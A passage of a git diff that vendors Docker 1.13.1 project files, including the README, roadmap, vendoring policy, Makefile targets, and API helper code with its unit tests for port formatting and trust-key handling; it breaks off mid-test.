$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-rpm + +run: build ## run the docker daemon in a container + $(DOCKER_RUN_DOCKER) sh -c "KEEPBUNDLE=1 hack/make.sh install-binary run" + +shell: build ## start a shell inside the build env + $(DOCKER_RUN_DOCKER) bash + +test: build ## run the unit, integration and docker-py tests + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary cross test-unit test-integration-cli test-docker-py + +test-docker-py: build ## run the docker-py tests + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary test-docker-py + +test-integration-cli: build ## run the integration tests + $(DOCKER_RUN_DOCKER) hack/make.sh build-integration-test-binary dynbinary test-integration-cli + +test-unit: build ## run the unit tests + $(DOCKER_RUN_DOCKER) hack/make.sh test-unit + +tgz: build ## build the archives (.zip on windows and .tgz\notherwise) containing the binaries + $(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross tgz + +validate: build ## validate DCO, Seccomp profile generation, gofmt,\n./pkg/ isolation, golint, tests, tomls, go vet and vendor + $(DOCKER_RUN_DOCKER) hack/validate/all + +win: build ## cross build the binary for windows + $(DOCKER_RUN_DOCKER) hack/make.sh win + +.PHONY: swagger-gen +swagger-gen: + docker run --rm -v $(PWD):/go/src/github.com/docker/docker \ + -w /go/src/github.com/docker/docker \ + --entrypoint hack/generate-swagger-api.sh \ + -e GOPATH=/go \ + quay.io/goswagger/swagger:0.7.4 diff --git a/vendor/github.com/docker/docker/NOTICE b/vendor/github.com/docker/docker/NOTICE new file mode 100644 index 0000000000..8a37c1c7bc --- /dev/null +++ b/vendor/github.com/docker/docker/NOTICE @@ -0,0 +1,19 @@ +Docker +Copyright 2012-2016 Docker, Inc. + +This product includes software developed at Docker, Inc. (https://www.docker.com). + +This product contains software (https://github.com/kr/pty) developed +by Keith Rarick, licensed under the MIT License. + +The following is courtesy of our legal counsel: + + +Use and transfer of Docker may be subject to certain restrictions by the +United States and other governments. +It is your responsibility to ensure that your use and/or transfer does not +violate applicable laws. + +For more information, please see https://www.bis.doc.gov + +See also https://www.apache.org/dev/crypto.html and/or seek legal counsel. diff --git a/vendor/github.com/docker/docker/README.md b/vendor/github.com/docker/docker/README.md new file mode 100644 index 0000000000..0b33bdca0d --- /dev/null +++ b/vendor/github.com/docker/docker/README.md @@ -0,0 +1,304 @@ +Docker: the container engine [![Release](https://img.shields.io/github/release/docker/docker.svg)](https://github.com/docker/docker/releases/latest) +============================ + +Docker is an open source project to pack, ship and run any application +as a lightweight container. + +Docker containers are both *hardware-agnostic* and *platform-agnostic*. +This means they can run anywhere, from your laptop to the largest +cloud compute instance and everything in between - and they don't require +you to use a particular language, framework or packaging system. That +makes them great building blocks for deploying and scaling web apps, +databases, and backend services without depending on a particular stack +or provider. + +Docker began as an open-source implementation of the deployment engine which +powered [dotCloud](http://web.archive.org/web/20130530031104/https://www.dotcloud.com/), +a popular Platform-as-a-Service. It benefits directly from the experience +accumulated over several years of large-scale operation and support of hundreds +of thousands of applications and databases. + +![Docker logo](docs/static_files/docker-logo-compressed.png "Docker") + +## Security Disclosure + +Security is very important to us. If you have any issue regarding security, +please disclose the information responsibly by sending an email to +security@docker.com and not by creating a GitHub issue. + +## Better than VMs + +A common method for distributing applications and sandboxing their +execution is to use virtual machines, or VMs. Typical VM formats are +VMware's vmdk, Oracle VirtualBox's vdi, and Amazon EC2's ami. In theory +these formats should allow every developer to automatically package +their application into a "machine" for easy distribution and deployment. +In practice, that almost never happens, for a few reasons: + + * *Size*: VMs are very large which makes them impractical to store + and transfer. + * *Performance*: running VMs consumes significant CPU and memory, + which makes them impractical in many scenarios, for example local + development of multi-tier applications, and large-scale deployment + of cpu and memory-intensive applications on large numbers of + machines. + * *Portability*: competing VM environments don't play well with each + other. Although conversion tools do exist, they are limited and + add even more overhead. + * *Hardware-centric*: VMs were designed with machine operators in + mind, not software developers. As a result, they offer very + limited tooling for what developers need most: building, testing + and running their software. For example, VMs offer no facilities + for application versioning, monitoring, configuration, logging or + service discovery. + +By contrast, Docker relies on a different sandboxing method known as +*containerization*. Unlike traditional virtualization, containerization +takes place at the kernel level. Most modern operating system kernels +now support the primitives necessary for containerization, including +Linux with [openvz](https://openvz.org), +[vserver](http://linux-vserver.org) and more recently +[lxc](https://linuxcontainers.org/), Solaris with +[zones](https://docs.oracle.com/cd/E26502_01/html/E29024/preface-1.html#scrolltoc), +and FreeBSD with +[Jails](https://www.freebsd.org/doc/handbook/jails.html). + +Docker builds on top of these low-level primitives to offer developers a +portable format and runtime environment that solves all four problems. +Docker containers are small (and their transfer can be optimized with +layers), they have basically zero memory and cpu overhead, they are +completely portable, and are designed from the ground up with an +application-centric design. + +Perhaps best of all, because Docker operates at the OS level, it can still be +run inside a VM! + +## Plays well with others + +Docker does not require you to buy into a particular programming +language, framework, packaging system, or configuration language. + +Is your application a Unix process? Does it use files, tcp connections, +environment variables, standard Unix streams and command-line arguments +as inputs and outputs? Then Docker can run it. + +Can your application's build be expressed as a sequence of such +commands? Then Docker can build it. + +## Escape dependency hell + +A common problem for developers is the difficulty of managing all +their application's dependencies in a simple and automated way. + +This is usually difficult for several reasons: + + * *Cross-platform dependencies*. Modern applications often depend on + a combination of system libraries and binaries, language-specific + packages, framework-specific modules, internal components + developed for another project, etc. These dependencies live in + different "worlds" and require different tools - these tools + typically don't work well with each other, requiring awkward + custom integrations. + + * *Conflicting dependencies*. Different applications may depend on + different versions of the same dependency. Packaging tools handle + these situations with various degrees of ease - but they all + handle them in different and incompatible ways, which again forces + the developer to do extra work. + + * *Custom dependencies*. A developer may need to prepare a custom + version of their application's dependency. Some packaging systems + can handle custom versions of a dependency, others can't - and all + of them handle it differently. + + +Docker solves the problem of dependency hell by giving the developer a simple +way to express *all* their application's dependencies in one place, while +streamlining the process of assembling them. If this makes you think of +[XKCD 927](https://xkcd.com/927/), don't worry. Docker doesn't +*replace* your favorite packaging systems. It simply orchestrates +their use in a simple and repeatable way. How does it do that? With +layers. + +Docker defines a build as running a sequence of Unix commands, one +after the other, in the same container. Build commands modify the +contents of the container (usually by installing new files on the +filesystem), the next command modifies it some more, etc. Since each +build command inherits the result of the previous commands, the +*order* in which the commands are executed expresses *dependencies*. + +Here's a typical Docker build process: + +```bash +FROM ubuntu:12.04 +RUN apt-get update && apt-get install -y python python-pip curl +RUN curl -sSL https://github.com/shykes/helloflask/archive/master.tar.gz | tar -xzv +RUN cd helloflask-master && pip install -r requirements.txt +``` + +Note that Docker doesn't care *how* dependencies are built - as long +as they can be built by running a Unix command in a container. + + +Getting started +=============== + +Docker can be installed either on your computer for building applications or +on servers for running them. To get started, [check out the installation +instructions in the +documentation](https://docs.docker.com/engine/installation/). + +Usage examples +============== + +Docker can be used to run short-lived commands, long-running daemons +(app servers, databases, etc.), interactive shell sessions, etc. + +You can find a [list of real-world +examples](https://docs.docker.com/engine/examples/) in the +documentation. + +Under the hood +-------------- + +Under the hood, Docker is built on the following components: + +* The + [cgroups](https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt) + and + [namespaces](http://man7.org/linux/man-pages/man7/namespaces.7.html) + capabilities of the Linux kernel +* The [Go](https://golang.org) programming language +* The [Docker Image Specification](https://github.com/docker/docker/blob/master/image/spec/v1.md) +* The [Libcontainer Specification](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md) + +Contributing to Docker [![GoDoc](https://godoc.org/github.com/docker/docker?status.svg)](https://godoc.org/github.com/docker/docker) +====================== + +| **Master** (Linux) | **Experimental** (Linux) | **Windows** | **FreeBSD** | +|------------------|----------------------|---------|---------| +| [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/) | [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/) | + +Want to hack on Docker? Awesome! We have [instructions to help you get +started contributing code or documentation](https://docs.docker.com/opensource/project/who-written-for/). + +These instructions are probably not perfect, please let us know if anything +feels wrong or incomplete. Better yet, submit a PR and improve them yourself. + +Getting the development builds +============================== + +Want to run Docker from a master build? You can download +master builds at [master.dockerproject.org](https://master.dockerproject.org). +They are updated with each commit merged into the master branch. + +Don't know how to use that super cool new feature in the master build? Check +out the master docs at +[docs.master.dockerproject.org](http://docs.master.dockerproject.org). + +How the project is run +====================== + +Docker is a very, very active project. If you want to learn more about how it is run, +or want to get more involved, the best place to start is [the project directory](https://github.com/docker/docker/tree/master/project). + +We are always open to suggestions on process improvements, and are always looking for more maintainers. + +### Talking to other Docker users and contributors + + + + + + + + + + + + + + + + + + + + + + + + +
Internet Relay Chat (IRC) +

+ IRC is a direct line to our most knowledgeable Docker users; we have + both the #docker and #docker-dev group on + irc.freenode.net. + IRC is a rich chat protocol but it can overwhelm new users. You can search + our chat archives. +

+ Read our IRC quickstart guide for an easy way to get started. +
Docker Community Forums + The Docker Engine + group is for users of the Docker Engine project. +
Google Groups + The docker-dev group is for contributors and other people + contributing to the Docker project. You can join this group without a + Google account by sending an email to docker-dev+subscribe@googlegroups.com. + You'll receive a join-request message; simply reply to the message to + confirm your subscription. +
Twitter + You can follow Docker's Twitter feed + to get updates on our products. You can also tweet us questions or just + share blogs or stories. +
Stack Overflow + Stack Overflow has over 7000 Docker questions listed. We regularly + monitor Docker questions + and so do many other knowledgeable Docker users. +
+ +### Legal + +*Brought to you courtesy of our legal counsel. For more context, +please see the [NOTICE](https://github.com/docker/docker/blob/master/NOTICE) document in this repo.* + +Use and transfer of Docker may be subject to certain restrictions by the +United States and other governments. + +It is your responsibility to ensure that your use and/or transfer does not +violate applicable laws. + +For more information, please see https://www.bis.doc.gov + + +Licensing +========= +Docker is licensed under the Apache License, Version 2.0. See +[LICENSE](https://github.com/docker/docker/blob/master/LICENSE) for the full +license text. + +Other Docker Related Projects +============================= +There are a number of projects under development that are based on Docker's +core technology. These projects expand the tooling built around the +Docker platform to broaden its application and utility. + +* [Docker Registry](https://github.com/docker/distribution): Registry +server for Docker (hosting/delivery of repositories and images) +* [Docker Machine](https://github.com/docker/machine): Machine management +for a container-centric world +* [Docker Swarm](https://github.com/docker/swarm): A Docker-native clustering +system +* [Docker Compose](https://github.com/docker/compose) (formerly Fig): +Define and run multi-container apps +* [Kitematic](https://github.com/docker/kitematic): The easiest way to use +Docker on Mac and Windows + +If you know of another project underway that should be listed here, please help +us keep this list up-to-date by submitting a PR. + +Awesome-Docker +============== +You can find more projects, tools and articles related to Docker on the [awesome-docker list](https://github.com/veggiemonk/awesome-docker). Add your project there. diff --git a/vendor/github.com/docker/docker/ROADMAP.md b/vendor/github.com/docker/docker/ROADMAP.md new file mode 100644 index 0000000000..21fe06dba6 --- /dev/null +++ b/vendor/github.com/docker/docker/ROADMAP.md @@ -0,0 +1,118 @@ +Docker Engine Roadmap +===================== + +### How should I use this document? + +This document provides description of items that the project decided to prioritize. This should +serve as a reference point for Docker contributors to understand where the project is going, and +help determine if a contribution could be conflicting with some longer terms plans. + +The fact that a feature isn't listed here doesn't mean that a patch for it will automatically be +refused (except for those mentioned as "frozen features" below)! We are always happy to receive +patches for new cool features we haven't thought about, or didn't judge priority. Please however +understand that such patches might take longer for us to review. + +### How can I help? + +Short term objectives are listed in the [wiki](https://github.com/docker/docker/wiki) and described +in [Issues](https://github.com/docker/docker/issues?q=is%3Aopen+is%3Aissue+label%3Aroadmap). Our +goal is to split down the workload in such way that anybody can jump in and help. Please comment on +issues if you want to take it to avoid duplicating effort! Similarly, if a maintainer is already +assigned on an issue you'd like to participate in, pinging him on IRC or GitHub to offer your help is +the best way to go. + +### How can I add something to the roadmap? + +The roadmap process is new to the Docker Engine: we are only beginning to structure and document the +project objectives. Our immediate goal is to be more transparent, and work with our community to +focus our efforts on fewer prioritized topics. + +We hope to offer in the near future a process allowing anyone to propose a topic to the roadmap, but +we are not quite there yet. For the time being, the BDFL remains the keeper of the roadmap, and we +won't be accepting pull requests adding or removing items from this file. + +# 1. Features and refactoring + +## 1.1 Runtime improvements + +We recently introduced [`runC`](https://runc.io) as a standalone low-level tool for container +execution. The initial goal was to integrate runC as a replacement in the Engine for the traditional +default libcontainer `execdriver`, but the Engine internals were not ready for this. + +As runC continued evolving, and the OCI specification along with it, we created +[`containerd`](https://containerd.tools/), a daemon to control and monitor multiple `runC`. This is +the new target for Engine integration, as it can entirely replace the whole `execdriver` +architecture, and container monitoring along with it. + +Docker Engine will rely on a long-running `containerd` companion daemon for all container execution +related operations. This could open the door in the future for Engine restarts without interrupting +running containers. + +## 1.2 Plugins improvements + +Docker Engine 1.7.0 introduced plugin support, initially for the use cases of volumes and networks +extensions. The plugin infrastructure was kept minimal as we were collecting use cases and real +world feedback before optimizing for any particular workflow. + +In the future, we'd like plugins to become first class citizens, and encourage an ecosystem of +plugins. This implies in particular making it trivially easy to distribute plugins as containers +through any Registry instance, as well as solving the commonly heard pain points of plugins needing +to be treated as somewhat special (being active at all time, started before any other user +containers, and not as easily dismissed). + +## 1.3 Internal decoupling + +A lot of work has been done in trying to decouple the Docker Engine's internals. In particular, the +API implementation has been refactored, and the Builder side of the daemon is now +[fully independent](https://github.com/docker/docker/tree/master/builder) while still residing in +the same repository. + +We are exploring ways to go further with that decoupling, capitalizing on the work introduced by the +runtime renovation and plugins improvement efforts. Indeed, the combination of `containerd` support +with the concept of "special" containers opens the door for bootstrapping more Engine internals +using the same facilities. + +## 1.4 Cluster capable Engine + +The community has been pushing for a more cluster capable Docker Engine, and a huge effort was spent +adding features such as multihost networking, and node discovery down at the Engine level. Yet, the +Engine is currently incapable of taking scheduling decisions alone, and continues relying on Swarm +for that. + +We plan to complete this effort and make Engine fully cluster capable. Multiple instances of the +Docker Engine being already capable of discovering each other and establish overlay networking for +their container to communicate, the next step is for a given Engine to gain ability to dispatch work +to another node in the cluster. This will be introduced in a backward compatible way, such that a +`docker run` invocation on a particular node remains fully deterministic. + +# 2 Frozen features + +## 2.1 Docker exec + +We won't accept patches expanding the surface of `docker exec`, which we intend to keep as a +*debugging* feature, as well as being strongly dependent on the Runtime ingredient effort. + +## 2.2 Remote Registry Operations + +A large amount of work is ongoing in the area of image distribution and provenance. This includes +moving to the V2 Registry API and heavily refactoring the code that powers these features. The +desired result is more secure, reliable and easier to use image distribution. + +Part of the problem with this part of the code base is the lack of a stable and flexible interface. +If new features are added that access the registry without solidifying these interfaces, achieving +feature parity will continue to be elusive. While we get a handle on this situation, we are imposing +a moratorium on new code that accesses the Registry API in commands that don't already make remote +calls. + +Currently, only the following commands cause interaction with a remote registry: + + - push + - pull + - run + - build + - search + - login + +In the interest of stabilizing the registry access model during this ongoing work, we are not +accepting additions to other commands that will cause remote interaction with the Registry API. This +moratorium will lift when the goals of the distribution project have been met. diff --git a/vendor/github.com/docker/docker/VENDORING.md b/vendor/github.com/docker/docker/VENDORING.md new file mode 100644 index 0000000000..3086f9d172 --- /dev/null +++ b/vendor/github.com/docker/docker/VENDORING.md @@ -0,0 +1,45 @@ +# Vendoring policies + +This document outlines recommended Vendoring policies for Docker repositories. +(Example, libnetwork is a Docker repo and logrus is not.) + +## Vendoring using tags + +Commit ID based vendoring provides little/no information about the updates +vendored. To fix this, vendors will now require that repositories use annotated +tags along with commit ids to snapshot commits. Annotated tags by themselves +are not sufficient, since the same tag can be force updated to reference +different commits. + +Each tag should: +- Follow Semantic Versioning rules (refer to section on "Semantic Versioning") +- Have a corresponding entry in the change tracking document. + +Each repo should: +- Have a change tracking document between tags/releases. Ex: CHANGELOG.md, +github releases file. + +The goal here is for consuming repos to be able to use the tag version and +changelog updates to determine whether the vendoring will cause any breaking or +backward incompatible changes. This also means that repos can specify having +dependency on a package of a specific version or greater up to the next major +release, without encountering breaking changes. + +## Semantic Versioning +Annotated version tags should follow Schema Versioning policies. +According to http://semver.org: + +"Given a version number MAJOR.MINOR.PATCH, increment the: + MAJOR version when you make incompatible API changes, + MINOR version when you add functionality in a backwards-compatible manner, and + PATCH version when you make backwards-compatible bug fixes. +Additional labels for pre-release and build metadata are available as extensions +to the MAJOR.MINOR.PATCH format." + +## Vendoring cadence +In order to avoid huge vendoring changes, it is recommended to have a regular +cadence for vendoring updates. e.g. monthly. + +## Pre-merge vendoring tests +All related repos will be vendored into docker/docker. +CI on docker/docker should catch any breaking changes involving multiple repos. diff --git a/vendor/github.com/docker/docker/VERSION b/vendor/github.com/docker/docker/VERSION new file mode 100644 index 0000000000..b50dd27dd9 --- /dev/null +++ b/vendor/github.com/docker/docker/VERSION @@ -0,0 +1 @@ +1.13.1 diff --git a/vendor/github.com/docker/docker/api/README.md b/vendor/github.com/docker/docker/api/README.md new file mode 100644 index 0000000000..464e056958 --- /dev/null +++ b/vendor/github.com/docker/docker/api/README.md @@ -0,0 +1,42 @@ +# Working on the Engine API + +The Engine API is an HTTP API used by the command-line client to communicate with the daemon. It can also be used by third-party software to control the daemon. + +It consists of various components in this repository: + +- `api/swagger.yaml` A Swagger definition of the API. +- `api/types/` Types shared by both the client and server, representing various objects, options, responses, etc. Most are written manually, but some are automatically generated from the Swagger definition. See [#27919](https://github.com/docker/docker/issues/27919) for progress on this. +- `cli/` The command-line client. +- `client/` The Go client used by the command-line client. It can also be used by third-party Go programs. +- `daemon/` The daemon, which serves the API. + +## Swagger definition + +The API is defined by the [Swagger](http://swagger.io/specification/) definition in `api/swagger.yaml`. This definition can be used to: + +1. To automatically generate documentation. +2. To automatically generate the Go server and client. (A work-in-progress.) +3. Provide a machine readable version of the API for introspecting what it can do, automatically generating clients for other languages, etc. + +## Updating the API documentation + +The API documentation is generated entirely from `api/swagger.yaml`. If you make updates to the API, you'll need to edit this file to represent the change in the documentation. + +The file is split into two main sections: + +- `definitions`, which defines re-usable objects used in requests and responses +- `paths`, which defines the API endpoints (and some inline objects which don't need to be reusable) + +To make an edit, first look for the endpoint you want to edit under `paths`, then make the required edits. Endpoints may reference reusable objects with `$ref`, which can be found in the `definitions` section. + +There is hopefully enough example material in the file for you to copy a similar pattern from elsewhere in the file (e.g. adding new fields or endpoints), but for the full reference, see the [Swagger specification](https://github.com/docker/docker/issues/27919) + +`swagger.yaml` is validated by `hack/validate/swagger` to ensure it is a valid Swagger definition. This is useful for when you are making edits to ensure you are doing the right thing. + +## Viewing the API documentation + +When you make edits to `swagger.yaml`, you may want to check the generated API documentation to ensure it renders correctly. + +All the documentation generation is done in the documentation repository, [docker/docker.github.io](https://github.com/docker/docker.github.io). The Swagger definition is vendored periodically into this repository, but you can manually copy over the Swagger definition to test changes. + +Copy `api/swagger.yaml` in this repository to `engine/api/[VERSION_NUMBER]/swagger.yaml` in the documentation repository, overwriting what is already there. Then, run `docker-compose up` in the documentation repository and browse to [http://localhost:4000/engine/api/](http://localhost:4000/engine/api/) when it finishes rendering. diff --git a/vendor/github.com/docker/docker/api/common.go b/vendor/github.com/docker/docker/api/common.go new file mode 100644 index 0000000000..fd065d5abe --- /dev/null +++ b/vendor/github.com/docker/docker/api/common.go @@ -0,0 +1,166 @@ +package api + +import ( + "encoding/json" + "encoding/pem" + "fmt" + "mime" + "os" + "path/filepath" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/docker/libtrust" +) + +// Common constants for daemon and client. +const ( + // DefaultVersion of Current REST API + DefaultVersion string = "1.26" + + // NoBaseImageSpecifier is the symbol used by the FROM + // command to specify that no base image is to be used. + NoBaseImageSpecifier string = "scratch" +) + +// byPortInfo is a temporary type used to sort types.Port by its fields +type byPortInfo []types.Port + +func (r byPortInfo) Len() int { return len(r) } +func (r byPortInfo) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byPortInfo) Less(i, j int) bool { + if r[i].PrivatePort != r[j].PrivatePort { + return r[i].PrivatePort < r[j].PrivatePort + } + + if r[i].IP != r[j].IP { + return r[i].IP < r[j].IP + } + + if r[i].PublicPort != r[j].PublicPort { + return r[i].PublicPort < r[j].PublicPort + } + + return r[i].Type < r[j].Type +} + +// DisplayablePorts returns formatted string representing open ports of container +// e.g. "0.0.0.0:80->9090/tcp, 9988/tcp" +// it's used by command 'docker ps' +func DisplayablePorts(ports []types.Port) string { + type portGroup struct { + first uint16 + last uint16 + } + groupMap := make(map[string]*portGroup) + var result []string + var hostMappings []string + var groupMapKeys []string + sort.Sort(byPortInfo(ports)) + for _, port := range ports { + current := port.PrivatePort + portKey := port.Type + if port.IP != "" { + if port.PublicPort != current { + hostMappings = append(hostMappings, fmt.Sprintf("%s:%d->%d/%s", port.IP, port.PublicPort, port.PrivatePort, port.Type)) + continue + } + portKey = fmt.Sprintf("%s/%s", port.IP, port.Type) + } + group := groupMap[portKey] + + if group == nil { + groupMap[portKey] = &portGroup{first: current, last: current} + // record order that groupMap keys are created + groupMapKeys = append(groupMapKeys, portKey) + continue + } + if current == (group.last + 1) { + group.last = current + continue + } + + result = append(result, formGroup(portKey, group.first, group.last)) + groupMap[portKey] = &portGroup{first: current, last: current} + } + for _, portKey := range groupMapKeys { + g := groupMap[portKey] + result = append(result, formGroup(portKey, g.first, g.last)) + } + result = append(result, hostMappings...) + return strings.Join(result, ", ") +} + +func formGroup(key string, start, last uint16) string { + parts := strings.Split(key, "/") + groupType := parts[0] + var ip string + if len(parts) > 1 { + ip = parts[0] + groupType = parts[1] + } + group := strconv.Itoa(int(start)) + if start != last { + group = fmt.Sprintf("%s-%d", group, last) + } + if ip != "" { + group = fmt.Sprintf("%s:%s->%s", ip, group, group) + } + return fmt.Sprintf("%s/%s", group, groupType) +} + +// MatchesContentType validates the content type against the expected one +func MatchesContentType(contentType, expectedType string) bool { + mimetype, _, err := mime.ParseMediaType(contentType) + if err != nil { + logrus.Errorf("Error parsing media type: %s error: %v", contentType, err) + } + return err == nil && mimetype == expectedType +} + +// LoadOrCreateTrustKey attempts to load the libtrust key at the given path, +// otherwise generates a new one +func LoadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) { + err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700) + if err != nil { + return nil, err + } + trustKey, err := libtrust.LoadKeyFile(trustKeyPath) + if err == libtrust.ErrKeyFileDoesNotExist { + trustKey, err = libtrust.GenerateECP256PrivateKey() + if err != nil { + return nil, fmt.Errorf("Error generating key: %s", err) + } + encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath)) + if err != nil { + return nil, fmt.Errorf("Error serializing key: %s", err) + } + if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil { + return nil, fmt.Errorf("Error saving key file: %s", err) + } + } else if err != nil { + return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err) + } + return trustKey, nil +} + +func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) { + if ext == ".json" || ext == ".jwk" { + encoded, err = json.Marshal(key) + if err != nil { + return nil, fmt.Errorf("unable to encode private key JWK: %s", err) + } + } else { + pemBlock, err := key.PEMBlock() + if err != nil { + return nil, fmt.Errorf("unable to encode private key PEM: %s", err) + } + encoded = pem.EncodeToMemory(pemBlock) + } + return +} diff --git a/vendor/github.com/docker/docker/api/common_test.go b/vendor/github.com/docker/docker/api/common_test.go new file mode 100644 index 0000000000..31d6f58253 --- /dev/null +++ b/vendor/github.com/docker/docker/api/common_test.go @@ -0,0 +1,341 @@ +package api + +import ( + "io/ioutil" + "path/filepath" + "testing" + + "os" + + "github.com/docker/docker/api/types" +) + +type ports struct { + ports []types.Port + expected string +} + +// DisplayablePorts +func TestDisplayablePorts(t *testing.T) { + cases := []ports{ + { + []types.Port{ + { + PrivatePort: 9988, + Type: "tcp", + }, + }, + "9988/tcp"}, + { + []types.Port{ + { + PrivatePort: 9988, + Type: "udp", + }, + }, + "9988/udp", + }, + { + []types.Port{ + { + IP: "0.0.0.0", + PrivatePort: 9988, + Type: "tcp", + }, + }, + "0.0.0.0:0->9988/tcp", + }, + { + []types.Port{ + { + PrivatePort: 9988, + PublicPort: 8899, + Type: "tcp", + }, + }, + "9988/tcp", + }, + { + []types.Port{ + { + IP: "4.3.2.1", + PrivatePort: 9988, + PublicPort: 8899, + Type: "tcp", + }, + }, + "4.3.2.1:8899->9988/tcp", + }, + { + []types.Port{ + { + IP: "4.3.2.1", + PrivatePort: 9988, + PublicPort: 9988, + Type: "tcp", + }, + }, + "4.3.2.1:9988->9988/tcp", + }, + { + []types.Port{ + { + PrivatePort: 9988, + Type: "udp", + }, { + PrivatePort: 9988, + Type: "udp", + }, + }, + "9988/udp, 9988/udp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PublicPort: 9998, + PrivatePort: 9998, + Type: "udp", + }, { + IP: "1.2.3.4", + PublicPort: 9999, + PrivatePort: 9999, + Type: "udp", + }, + }, + "1.2.3.4:9998-9999->9998-9999/udp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PublicPort: 8887, + PrivatePort: 9998, + Type: "udp", + }, { + IP: "1.2.3.4", + PublicPort: 8888, + PrivatePort: 9999, + Type: "udp", + }, + }, + "1.2.3.4:8887->9998/udp, 1.2.3.4:8888->9999/udp", + }, + { + []types.Port{ + { + PrivatePort: 9998, + Type: "udp", + }, { + PrivatePort: 9999, + Type: "udp", + }, + }, + "9998-9999/udp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PrivatePort: 6677, + PublicPort: 7766, + Type: "tcp", + }, { + PrivatePort: 9988, + PublicPort: 8899, + Type: "udp", + }, + }, + "9988/udp, 1.2.3.4:7766->6677/tcp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PrivatePort: 9988, + PublicPort: 8899, + Type: "udp", + }, { + IP: "1.2.3.4", + PrivatePort: 9988, + PublicPort: 8899, + Type: "tcp", + }, { + IP: "4.3.2.1", + PrivatePort: 2233, + PublicPort: 3322, + Type: "tcp", + }, + }, + "4.3.2.1:3322->2233/tcp, 1.2.3.4:8899->9988/tcp, 1.2.3.4:8899->9988/udp", + }, + { + []types.Port{ + { + PrivatePort: 9988, + PublicPort: 8899, + Type: "udp", + }, { + IP: "1.2.3.4", + PrivatePort: 6677, + PublicPort: 7766, + Type: "tcp", + }, { + IP: "4.3.2.1", + PrivatePort: 2233, + PublicPort: 3322, + Type: "tcp", + }, + }, + "9988/udp, 4.3.2.1:3322->2233/tcp, 1.2.3.4:7766->6677/tcp", + }, + { + []types.Port{ + { + PrivatePort: 80, + Type: "tcp", + }, { + PrivatePort: 1024, + Type: "tcp", + }, { + PrivatePort: 80, + Type: "udp", + }, { + PrivatePort: 1024, + Type: "udp", + }, { + IP: "1.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "tcp", + }, { + IP: "1.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "udp", + }, { + IP: "1.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "tcp", + }, { + IP: "1.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "udp", + }, { + IP: "2.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "tcp", + }, { + IP: "2.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "udp", + }, { + IP: "2.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "tcp", + }, { + IP: "2.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "udp", + }, + }, + "80/tcp, 80/udp, 1024/tcp, 1024/udp, 1.1.1.1:1024->80/tcp, 1.1.1.1:1024->80/udp, 2.1.1.1:1024->80/tcp, 2.1.1.1:1024->80/udp, 1.1.1.1:80->1024/tcp, 1.1.1.1:80->1024/udp, 2.1.1.1:80->1024/tcp, 2.1.1.1:80->1024/udp", + }, + } + + for _, port := range cases { + actual := DisplayablePorts(port.ports) + if port.expected != actual { + t.Fatalf("Expected %s, got %s.", port.expected, actual) + } + } +} + +// MatchesContentType +func TestJsonContentType(t *testing.T) { + if !MatchesContentType("application/json", "application/json") { + t.Fail() + } + + if !MatchesContentType("application/json; charset=utf-8", "application/json") { + t.Fail() + } + + if MatchesContentType("dockerapplication/json", "application/json") { + t.Fail() + } +} + +// LoadOrCreateTrustKey +func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) { + tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpKeyFolderPath) + + tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile") + if err != nil { + t.Fatal(err) + } + + if _, err := LoadOrCreateTrustKey(tmpKeyFile.Name()); err == nil { + t.Fatalf("expected an error, got nothing.") + } + +} + +func TestLoadOrCreateTrustKeyCreateKey(t *testing.T) { + tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpKeyFolderPath) + + // Without the need to create the folder hierarchy + tmpKeyFile := filepath.Join(tmpKeyFolderPath, "keyfile") + + if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil { + t.Fatalf("expected a new key file, got : %v and %v", err, key) + } + + if _, err := os.Stat(tmpKeyFile); err != nil { + t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err) + } + + // With the need to create the folder hierarchy as tmpKeyFie is in a path + // where some folders do not exist. + tmpKeyFile = filepath.Join(tmpKeyFolderPath, 